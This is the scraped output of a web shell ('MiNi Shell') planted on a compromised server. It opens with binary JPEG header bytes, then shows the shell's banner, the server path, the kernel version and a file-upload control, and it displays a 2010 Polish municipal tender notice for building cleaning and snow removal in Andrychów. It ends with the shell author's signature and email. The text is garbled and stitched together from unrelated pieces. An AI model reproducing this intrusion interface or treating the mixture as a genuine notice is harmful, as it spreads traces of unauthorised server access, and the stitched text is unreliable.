JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/381428-N-2010.html

<p class="kh_header"><b>Andrychów: Utrzymanie czystości i porządku w budynkach oraz sprzątanie i odśnieżanie terenów administrowanych przez Zespół Obsługi Mienia Komunalnego w Andrychowie
w roku 2011.</b><br>
<b>Numer ogłoszenia: 381428 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Mienia Komunalnego , ul. Metalowców 6, 34-120 Andrychów, woj. małopolskie, tel. 033 8753168, faks 033 8752391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zomk@andrychow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości i porządku w budynkach oraz sprzątanie i odśnieżanie terenów administrowanych przez Zespół Obsługi Mienia Komunalnego w Andrychowie
w roku 2011..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi związane z  utrzymaniem czystości i porządku w budynkach oraz sprzątanie i odśnieżanie terenów administrowanych przez Zespół Obsługi Mienia Komunalnego  Andrychowie obejmujące swym zakresem:

1. Sprzątanie pomieszczeń ogólnodostępnych w  budynku Inkubatora Przedsiębiorczości ul. Starowiejska 22 a -   polegające na: 
1) utrzymanie na bieżąco w należytym stanie , porządku i czystości pomieszczeń wspólnego użytku  (korytarzy, klatek schodowych, pomieszczeń sanitarnych) - powierzchnia około 500 m2, 
2) mycie okien drzwi wewnętrznych w pomieszczeniach wspólnego użytku  2 razy w roku (maj, październik)  -  powierzchnia szyb około 130 m2,
3) mycie drzwi wejściowych według potrzeb, powierzchnia szyb około       
    12 m2,                ,               
4) utrzymywanie na bieżąco czystości w bezpośrednim otoczeniu budynku - sprzątanie: terenów przyległych do budynku - placów, chodników - powierzchnia  około 550 m2,
5) utrzymywanie na bieżąco terenów zielonych wokół budynku (około 1500 m2) w tym: zbieranie śmieci, grabienie wiosenne i jesienne   ( grabienie i zbieranie liści),
6) bieżące oczyszczanie  ze śniegu, lodu, błota i innych nieczystości(około 550 m2): schodów wejściowych, chodników przy budynku, wjazdów.     
2.  Sprzątanie części ogólnodostępnych i terenów przyległych do budynków: ul. Pachla 2, ul. Krakowska 107,  ul. Krakowska 146A,  ul. Floriańska 3A , Rynek 27 tj.:
1) utrzymanie na bieżąco i należytym stanie , porządku i czystości pomieszczeń wspólnego użytku, z wyjątkiem podestów, schodów i lamperii na klatkach schodowych, - powierzchnia około 290m2,
2) mycie okien na klatkach 2 razy w roku (maj, październik), - powierzchnia około 20 m2,
3) mycie drzwi wejściowych wg potrzeb, - powierzchnia około 25 m2 (w tym 8m2 powierzchni luxfer),
4) utrzymywanie na bieżąco czystości w bezpośrednim otoczeniu budynków - sprzątanie: wiat na nieczystości stałe lub miejsc wokół pojemników na śmieci, dojścia do wiat, terenów przyległych do  budynków, 
         - powierzchnia  terenów zielonych - około 2050 m2,
         - powierzchnia  chodników - około 350 m2,
5) utrzymywanie na bieżąco terenów zielonych (około 2050m2) wokół budynków w tym: grabienie  wiosenne i jesienne ( grabienie i zbieranie liści),
6) bieżące oczyszczanie ze śniegu, lodu, błota i innych nieczystości: schodów wejściowych, chodników przy budynkach i opasek przy budynkach (około  350m2)
3. Utrzymywanie chodników (powierzchnia około 2610 m2), placów i terenów zielonych (o powierzchni około 40.000m2):
- w rejonie Pawilonu Handlowego ul. Włókniarzy 1 -150m2,
- wskazanych przez Zleceniodawcę, znajdujących się na terenach gminnych - 2460 m2 :
   1) Olszyny - 360m2,
   2) Ul. 1 Maja  i Plac Mickiewicza  - 180m2, 
   3) Ul. Włókniarzy - 240 m2
   4) Ul. Metalowców - 770 m2,
   5) Ul. Starowiejska,  - 700 m2
   6) Ul. Lenartowicza  - 210 m2         
Warunki  wiosenno - jesiennego utrzymania chodników, placów i terenów zielonych : 
a) bieżące utrzymanie czystości  przy użyciu sprzętu mechanicznego lub poprzez ręczne zamiatanie, zgrabienie lub zbieranie odpadów , usunięcie nieczystości i następnie wywóz zebranych odpadów na składowisko odpadów , 
b) odchwaszczanie chodników  przy  krawężnikach i między płytkami ( przy użyciu motyk, szpachli itp.sprzętu ogrodniczego),
c) prace powinny być prowadzone sprawnie, bez nieuzasadnionych przestojów w sposób powodujący jak najmniejsze utrudnienie dla użytkowników chodników i placów,
d)w przypadku  alejek o nawierzchni mineralnej należy zachować szczególna ostrożność, aby przy usuwaniu chwastów nie naruszać utwardzonej warstwy ścieralnej,
e)nawierzchnie z płyt , kostki itp. należy oczyścić przez wyrwanie wyrastających w szczelinach chwastów lub w przypadku braku takiej możliwości wycięcie przy użyciu w.w sprzętu wraz z zebraniem namułu , piachu i innych nagromadzonych zanieczyszczeń,
f) po usunięciu chwastów nawierzchnia winna być pozamiatana,
g) chwasty wraz  z innymi zanieczyszczeniami należy zebrać i wywieźć w czasie nie przekraczającym 1 dnia od momentu wyrwania,
h) przez oczyszczenie krawężnika rozumiane jest odsłonięcie jego (główki) oraz całkowite oczyszczenie jego wewnętrznej strony bez wycinania w darni rowka po zewnętrznej  stronie krawężnika,
i) odspojona darń winna być pryzmowana w sposób nie powodujący nadmiernych utrudnień w użytkowaniu oczyszczonych ciągów komunikacyjnych i wywieziona w tym samym dniu na składowisko odpadów,
j)utrzymywanie terenów zielonych polega na bieżącym utrzymaniu czystości poprzez zbieranie odpadów i zanieczyszczeń z trawy, żywopłotów i krzaków oraz grabienie trawy wiosenne i jesienne.
k) ustala się termin zakończenia grabienia wiosennego trawy na 30.04.2011r.,  a  jesiennego na  10.11.2011r.
Warunki zimowego utrzymania chodników:
a)przez zimowe utrzymanie chodników należy rozumieć zwalczanie śliskości i odśnieżanie w celu prawidłowego funkcjonowania ruchu pieszego w warunkach zimowych, ( minimalna szerokość chodnika  o szerokości 1m po odśnieżeniu około 0,70m, natomiast chodnika o szerokości ponad 1m - po odśnieżeniu około 1m),
b)   standardy usługi: - kilkukrotne w ciągu dnia pełne utrzymanie zimowe chodników poprzez dokładne odśnieżanie i posypywanie piaskiem  ( lub piaskiem z solą) w sposób nie utrudniający ruchu pieszego oraz do nie pozostawiania nie ubitej  (rozchodzonej ) warstwy śniegu utrudniającej poruszanie się pieszych,
- patrolowanie stanu nawierzchni chodników i systematyczne wykonywanie prac zwalczających występującą  śliskość poprzez posypywanie piaskiem ( lub piaskiem z solą),  - przy odśnieżaniu chodników szczególną uwagę należy zwrócić na dokładne uprzątnięcie śniegu  z dróg dojścia i z wejść na przejścia dla pieszych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9, 90.91.12.00-8, 90.91.13.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się posiadaniem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca   jest   ubezpieczony   od   odpowiedzialności   cywilnej (deliktowej i     kontraktowej )  w zakresie   prowadzonej   działalności   związanej  z  przedmiotem zamówienia na kwotę  
minimum 50.000,- zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wprowadzenie istotnych zmian w umowie może wynikać z następujących okoliczności:
a)gdy z przyczyn organizacyjnych konieczna będzie zmiana  osób upoważnionych do dokonywania czynności lub zmiana danych teleadresowych określonych w umowie,
b)zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów   podatkowych,
c)jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.andrychow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Mienia Komunalnego w Andrychowie ul. Metalowców 6
34-120 Andrychów pokój nr 6 w godzinach : 8.00 do 13.00 z wyjątkiem sobót i dni ustawowo wolnych od pracy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 10:00, miejsce: siedziba Zespołu Obsługi Mienia Komuanlnego w Andrychowie ul. Metalowców 6 
34-120 Andrychów pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com